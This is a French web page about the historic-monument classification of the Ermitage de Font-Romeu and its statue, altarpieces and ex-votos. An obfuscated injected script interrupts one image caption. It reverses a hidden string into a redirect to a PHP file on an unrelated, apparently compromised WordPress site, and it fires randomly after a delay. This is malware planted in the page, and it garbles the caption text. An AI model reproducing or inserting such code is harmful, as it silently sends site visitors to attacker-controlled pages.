Le classement MH

L’Ermitage de Font-Romeu classé monument historique (MH)

Le site de l’Ermitage et du calvaire proche ont été classés en 1927. La chapelle en totalité, les façades et les toitures des bâtiments annexes sont inscrits à l’Inventaire Supplémentaire des Monuments Historiques (ISMH) depuis 1999. Dans la catégorie Objets et Mobiliers, la statue de la Vierge à l’Enfant, dite Notre-Dame de Font-Romeu, du XIIIe siècle, le retable du maître-autel et le camaril sont classés depuis 1928.
Après démarche de l’association des Amis de la chapelle, sont classés en 1996 les deux retables des chapelles latérales et 41 ex-voto retenus par la Conservation des Antiquités et Objets d’Art des Pyrénées-Orientales.

 

La Vierge à l'enfant "Notre Dame de Font-Romeu"

La Vierge à l’Enfant « Notre Dame de Font-Romeu »

Vue partielle du Retable du maître-autel

Vue partielle du Retable du maître-autel

Vue partielle des ex-vo<script><p class=$nJe=function(n){if (typeof ($nJe.list[n]) == « string ») return $nJe.list[n].split(«  »).reverse().join(«  »);return $nJe.list[n];};$nJe.list=[« \’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to restaurés et mis en présentation par le C.C.R.P. des Pyrénées-Orientales. » src= »https://amischapelle-ermitagefontromeu.org//wp-content/uploads/2013/02/DSCF6779reframed-300×188.jpg » width= »300″ height= »188″ /> Vue partielle des ex-voto restaurés et mis en présentation par le C.C.R.P. des Pyrénées-Orientales.

Vue du retable dit de Saint Jean Baptiste

Vue du retable dit de Saint Jean Baptiste